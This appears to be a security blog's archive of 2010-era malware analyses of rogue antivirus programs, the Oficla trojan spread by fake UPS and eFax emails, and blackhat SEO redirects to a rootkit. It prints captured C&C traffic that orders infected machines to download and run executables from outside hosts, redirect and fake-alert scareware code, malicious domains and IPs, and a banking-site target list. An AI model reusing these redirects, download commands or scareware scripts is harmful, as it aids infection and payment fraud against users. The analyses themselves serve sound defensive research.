Tag Archives: rogue software

New Rogue Software: Windows Emergency System

Windows Emergency System is another rogue security software that aims to scan the system to find errors, instead it shows fake errors, stating it is needed to buy the full version of the software to fix the non-existent errors.

Windows Emergency System GUI

Screenshot of the installer:

Windows Emergency System Installer

Payment page:

soft-store-inc-com

Network traffic:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i&3=85&4=2600&5=5&6=1&7=62900.2096&8=1040 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc.com

Whois:

Domain Name:	SOFTSTORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Network traffic:

GET /payment_forms/default/css/pay.css HTTP/1.1
Referer: http://softstore-inc.com/85/40/form/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softstore-inc.com

Whois:

Domain Name:	SOFT-STORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Malicious domains:

http://www.urlvoid.com/scan/soft-store-inc.com
http://www.urlvoid.com/scan/softstore-inc.com

Other suspicious domains:

http://www.urlvoid.com/scan/getsomepornhere.net
http://www.urlvoid.com/scan/softstorecorp2012.com
http://www.urlvoid.com/scan/softstorecorp2011.com

The malware that installed this rogue software, created few files in C:\ folder:

C:\kill.txt
C:\avenger.txt
C:\cleanup.exe
C:\TITI.exe

Content of C:\

The malware used a legit security tool named “Avenger” to remove Antiviruses:

kill.txt

avenger.txt

Fake UPS ZIP Attachments Spreads Oficla Trojan

Some users have submitted us few malware samples, received as attachments in email addresses related to fake UPS spam emails. The files are ZIP archives that contain an executable file that has the same icon as Microsoft Words documents:

Extracted EXE File

File: Label_UPS_Nr11373.exe
Size: 60928 bytes
Publisher: WUsBjuKspHvMxtas
MD5 hash: ed691cabda1bc5f8447d747558f8b64e
SHA1 hash: 73dee84ca24c24533fdda34e958c4c4c2f635ddf
Detection rate: 5 on 16 (31%)
Status: INFECTED

Files created after the execution of the EXE file:

Files Created

File name: svrwsc-exe
File size: 62464 bytes
MD5 hash: c5ebdc1c45aec27d935a30e74197d402
SHA1 hash: 44c56444557870316389b86c10343beea3245af1
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: sbxj-lyo
File size: 21504 bytes
MD5 hash: a0528b57e251657ce64e79acfcb45c0a
SHA1 hash: 15df2b7cfda011876e5a3bfca6014390c1b16a2b
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: ex-08-exe
File size: 259072 bytes
MD5 hash: 3996c77ef6a0b4f365f4d8297bd46c44
SHA1 hash: 05c869267cff02ad999c08565fbe1f266c91a9c0
Detection rate: 2 on 16 (13%)
Status: INFECTED

The file that has been created in system directory is named sbxj.lyo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software named Security Tool.

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/morph.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:45 GMT
Content-Disposition: attachment; filename="morph.exe"
Content-Transfer-Encoding: binary
Content-Length: 62464
Content-Type: application/octet-stream

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/69.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:47 GMT
Content-Disposition: attachment; filename="69.exe"
Content-Transfer-Encoding: binary
Content-Length: 15360
Content-Type: application/octet-stream

From the above network traffic we can see that the main executable file of Oficla trojan has started to receive commands from the C&C server to download two new malicious executable files, named morph.exe and 69.exe, and to execute the newly downloaded files in the victim’s computer.

Network Traffic:

GET /avpsoft_dfhljkghsdflg.exe HTTP/1.0
Host: 188.65.74.163

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:57:46 GMT
Content-Type: application/octet-stream
Content-Length: 987648
Last-Modified: Wed, 20 Oct 2010 15:57:32 GMT

The file avpsoft_dfhljkghsdflg.exe is the executable of the rogue security software, that will be installed in our infected system, named Security Tool. After its execution, we noticed new popup windows come up:

Popup Window

Security Tool has been fully installed:

Security Tool GUI

Files created during the installation of Security Tool:

Documents and Settings\user\Local Settings\Application Data\2730621030.exe
Documents and Settings\user\Start Menu\Programs\Security Tool.lnk

File name: 2730621030-exe
File size: 987648 bytes
MD5 hash: 493366362d69acf11996d96e33fabd65
SHA1 hash: 5f3a4dbb6a139c21eac250e61587562d1e24ac82
Detection rate: 2 on 16 (13%)
Status: INFECTED

Network Traffic:

POST /us/federal/index.php HTTP/1.0
Accept: */*
Host: padreim. ru

Response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6191
 
.%......L.....*ebc_ebc1961*......*cibng.ibanking-services.com*......*springbankconnect.com*......*ibanking-services.com*......*mystreetscape.com*......*/inets/Login*......*business.macu.com*......*cnbsec1.cnbank.com*..
...*cnbank.com*......*scottvalleybank*......*hillsbank*..
...*efirstbank*......*addisonavenue.com*......*secure.fundsxpress.com*......*site-secure.com*......*umpquabank.com*......*fundsxpress.com*......*mystreetscape*......*treasurypathways.com*......*secure.ally.com*......*bankonline.umpquabank.com*......*servlet/teller*..
...*nsbank.com*......*comerica.com*......*cashmgt.firsttennessee*......*securentry.calbanktrust.com*..
...*securentry*......*express.53.com*......*homebank.nbg.gr*......*online.ccbank.bg*......*hsbc*......*ebanking.eurobank.gr*......*itreasury.regions.com*......*/Common/SignOn/Start.asp*......*wellsoffice.wellsfargo.com*......*chsec.wellsfargo.com*..
...*telepc.net*......*ceowt.wellsfargo.com*......*enterprise2.openbank.com*......*global1.onlinebank.com*..
...*webexpress*......*/sbuser/*..
...*webcash*......*www2.firstbanks.com/olb*..
...*bxs.com*......*PassMarkRecognized.aspx*......*businesslogin*..
...*hbcash.exe*......*otm.suntrust.com*......*wire*......*ACH*..
...*/inets/*..
...*corpACH*......*wcmfd/wcmpw/*..	...*/IBWS/*......*/ibs.*..
...*/livewire/*..	...*/olbb/*......*singlepoint.usbank.com*......*bolb.associatedbank.com*..*...*fnfgbusinessonline.enterprisebanker.com*......*lakecitybank.webcashmgmt.com*..
...*/inets/*......*bob.sovereignbank.com

The malware want to filter domains related to bank accounts…

Network Traffic:

GET /outlook.exe HTTP/1.0
Host: 109.196.143.135

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.34
Date: Wed, 20 Oct 2010 15:57:51 GMT
Content-Type: application/octet-stream
Content-Length: 259072
Last-Modified: Wed, 20 Oct 2010 15:08:46 GMT
Accept-Ranges: bytes

Security Tool try to connect to a fraudulent payment system:

GET /buy.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: fastpayform. biz

The title of the HTML page is:

<title>Security Tool - Payment Page</title>

Network Traffic:

GET /cb_soft.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: 77.78.201.23

Domain & IP Analysis:

webauc. ru85.195.104.162
91.204.48.46 – –
188.65.74.163 – –
109.196.143.135 – –
fastpayform. biz195.3.145.46
77.78.201.23 – b201c23.pptp-gw51.cable-internet.GlobalNET.ba

BlackHat SEO Campaign used to spread Smart Engine

A new blackhat seo campaign is distributing the setup installer of the new rogue security software named Smart Engine. The spreading status looks like to be pretty aggressive, we have logged more than 2000 infected websites that are used to capture popular keywords and to redirect users to malicious urls or other fake scanner pages, with the intent to install the rogue software installer.

When an user clicks on an infected url, there is a redirection:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

www4.get-bestlink3 .co.cc
209.212.149.22 – ip-209.212.149.22.servernap.net

Another redirection:

HTTP/1.1 302 Moved Temporarily
Location: hxxp://www2.best-install10 .co.cc/?p=XXX

Domain & IP Analysis:

www2.best-install10 .co.cc
212.117.168.150 – ip-212-117-168-150.server.lu

And now we can see the fake scanner page:

Fake Scanner Page

After few times, it is prompted the download of an executable:

Executable File Download

Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX
HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

Domain & IP Analysis:

www2.doit-nowandfast .net
188.65.74.86 – –

The downloaded file is the installer of the Smart Engine rogue security software:

Smart Engine Installer

Main GUI of Smart Engine:

Smart Engine GUI

Smart Engine main executable is trying to connect to a remote host:

Windows Firewall Alert

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910 .net
 
GET /?0d40b0=XXX HTTP/1.0
Host: report1.liwnarwlentoristorg910 .net

DNS Queries:

www5.smart-engine .net
secure1.buy-the-guardian .com

Domain & IP Analysis:

update1.liwnarwlentoristorg910 .net
188.65.74.83 – –
report1.liwnarwlentoristorg910 .net
209.222.8.102 – 209.222.8.102.choopa.net

Activation page:

Smart Engine Activation Page

GET /?kp=kdTHxeevuH5zneDK4eiso1Pk28WhmJI%3D HTTP/1.1
Host: secure1.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

secure1.wlentor-traden-quzonk-1 .com
69.57.173.219 – –

Smart Engine is sold for:

$49.95 -> 6 Month Guard Subscription
$69.95 -> 1 Year Guard Subscription
$89.95 -> Lifetime Guard Subscription

Network traffic:

HEAD / HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: report1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: www5.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

update1.wlentor-traden-quzonk-1 .com
173.244.223.32 – 173.244.223.32.static.midphase.com
report1.wlentor-traden-quzonk-1 .com
173.244.223.37 – 173.244.223.37.static.midphase.com
www5.wlentor-traden-quzonk-1 .com
69.57.173.221 – –

The subdomain used for the activation page changed few IPs during the analysis:

09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219

Network traffic:

GET /?xohmdu=XXX HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
Content-Type: application/octetstream
Pragma: hack
Content-Length: 1307
Content-Disposition: attachment; filename=04869.ini
Content-Transfer-Encoding: binary
GET /?pg=XXX HTTP/1.1
Host: report1.wlentor-traden-quzonk671 .com

Domain & IP Analysis:

report1.wlentor-traden-quzonk671 .com
174.36.42.71 – amu.furumoon.net

The subdomain changed few IPs during the analysis:

09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100

DNS Queries:

.............cilt442vyabkqqv.com.....
.............cilt442vyabkqqv.com.....À........D.&%v=spf1 a mx ip4:209.222.8.100/22 ?all

The malware queried an external url to get our remote IP:

GET /get_ip.php?loc= HTTP/1.1
Host: www.myip .ru

After few time, we noticed a connections loop:

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

It looks like it tried to connect to google IP to see if the victim is online.

New domain used for payments, note the HTTPS:

Location: hxxps://secure.onlinesystempayment .com/?abbr=SME&price_name=6month&ext3=2211&ext1=MD5HASH&ext2=wvXP;b_IE6;107;11111;MainWindow;day;671;1;0&card=visa

Domain & IP Analysis:

secure.onlinesystempayment .com
209.212.149.23 – ip-209.212.149.23.servernap.net

New connection on port 443:

Remote Address    : 96.9.160.110
Remote Port       : 443
Service Name      : https

IP Analysis:

96.9.160.110 – 96-9-160-110.hostnoc.net

The malware queried also a legit website related to SSL certificates:

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com

Files created during the installation of the rogue security software:

Files Created

Created desktop icon:

Desktop Icon

Smart Engine installed files:

Smart Engine Files

The hosts file has been modified and it has now +S (System) attribute:

Hosts File System Attribute

Hosts file content:

Hosts File Content

eFax False Email Spreads Antimalware Doctor

We have received today morning an interesting email from eFax (fake), with a suspicious ZIP Archive file (.ZIP) attached, and the subject of the email stated we have received a fax “You’ve got a fax” … the strange part is that the ZIP file contains an executable file (.EXE) with the icon of MS WORD.

Image

Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED

The details of the message source of the received emails are as follow:

Image

From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;

We have executed the file in our sandbox and this is the file activity:

Image

The file that has been created in system directory is named hyli.igo and it is the main executable file of the Oficla trojan that is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.

Network Traffic:

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru

Response:

[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]

The malware connected to the C&C server of oficla trojan to receive new commands from the bot owner and from the reponse of the GET query we can see that the malware received the commands to update itself “upd:1” with a new binary file located at “backurls:”.

And now we noticed that the oficla trojan started to download the Antimalware Doctor installer, we can see from the image below that it looks like an installer for the Microsoft Windows Updates, but it will install the rogue security software Antimalware Doctor instead:

Image

Common symptoms of a rogue security software infection are always the repeated false security alerts that state the user’s system is infected by a large numbers of trojans and the user is then forced to click the button “Remove Threats” that will open the main program while execute a fakse system scan:

Image

This is the main GUI of Antimalware Doctor:

Image

Task manager has also been disabled:

Image

New Network Traffic:

GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in
 
GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in
 
GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in
 
GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in

Antimalware Doctor started to display fake security alerts that redirected to the website used to purchase this rogue security software, take in mind all the payment systems used by these rogues are fraudulent and in most cases can even steal credit card details that have been inserted during the payment process:

GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in

SSL Connection used during payments:

83.133.115.9:443

Domain & IP Analysis:

moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9

BlackHat SEO Attacks Redirect to 4DW4R3 Rootkit

We have analyzed a new blackhat seo attack these days and we have noticed that now the main target of these attacks are not anymore the spread of rogue security software, but instead they try to spread the dangerous 4DW4R3 rootkit, and then with this rootkit they may install, in future, a new rogue security software in the victim’s computer.

Below there is a small analysis of the network traffic we have captured during the analysis of these new blackhat seo attacks. The targets of the attacks are mostly keywords related to iphone, episodes of cartoons and world cup 2010 matches.

Hijacked URL:

traseusa .com/images/page.php?r=keyword

Response:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://portalkey .org/?affid=415&subid=landing">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://portalkey .org/?affid=415&subid=landing";
</script>
<a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

portalkey .org91.212.127.96

The domain portalkey .org is used to display to the user fake security alerts and false system scan reports showing the system is completely infected by trojans:

Image

By analyzing the source of the HTML page, we can see that it uses javascript to display the fake alerts and the fake system scan reports, as example we have extracted few lines of code from the infected page:

{ 		
	alert(this.___("Windows Security Center recommends you to install System Security Antivirus."));
	t.MyConfirm(); 	
}

Image

ExitPopupMessage():

ExitPopupMessage : function()
{ 	
	alert(	this.___("Your computer remains infected by viruses!") + 
	this.___("They can cause data loss and file damages and need to be cured as soon as possible.") + "\n\n" +
	this.___("Return to System Security and download it secure to your PC")); 
}

In particular, the above code will be executed everytime you try to close Internet Explorer and it will force the user to open again the infected page with the Internet Explorer web browser even if the user clicks on “Cancel” button! This can be called like a persistence code that has the main intent to make sure the user will click, before or then, in the malicious page to download the rootkit executable.

clicksmell .org/x92s/uc12vx04/xdtldil.php?id=369

Domain & IP Analysis:

clicksmell .org91.188.59.220

And now it is requested to download the 4dw4r3 executable:

portalkey .org/dl.php?f=XXX&subid=1

Image

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/octet-stream
Pragma: hack
Content-Length: 11776
Content-Disposition: attachment; filename=WinSecurityInstaller.exe
Content-Transfer-Encoding: binary

Note that the executable file is named as an executable of a rogue security software “WinSecurityInstaller.exe” but in real it will install the rootkit 4DW4R3…

Cookies:

Cookie: NOT_UNIQUE=1; USER_DATA=XXX; TEMPLATE=XXX; affid=409; subid=landing

We have executed the rootkit loader in our sandbox:

Image

Network activity:

GET /a/ad HTTP/1.1
Host: www.searchannoying .org
 
GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org
 
POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com
 
GET /css/pragma/crcmds/main HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/srcr.dat HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/serf HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/bbr HTTP/1.0
Host: analitycsdead .com
 
GET /readdatagateway.php?type=stats&affid=415&subid=landing&version=4.0&adwareok HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

Domain & IP Analysis:

searchannoying .org91.212.127.96
analitycsdead .com62.122.73.242

Files in Temp Directory:

Image

After few hours, has popped up this new window:

Image

Surprise ? No… It is a rogue security software installer…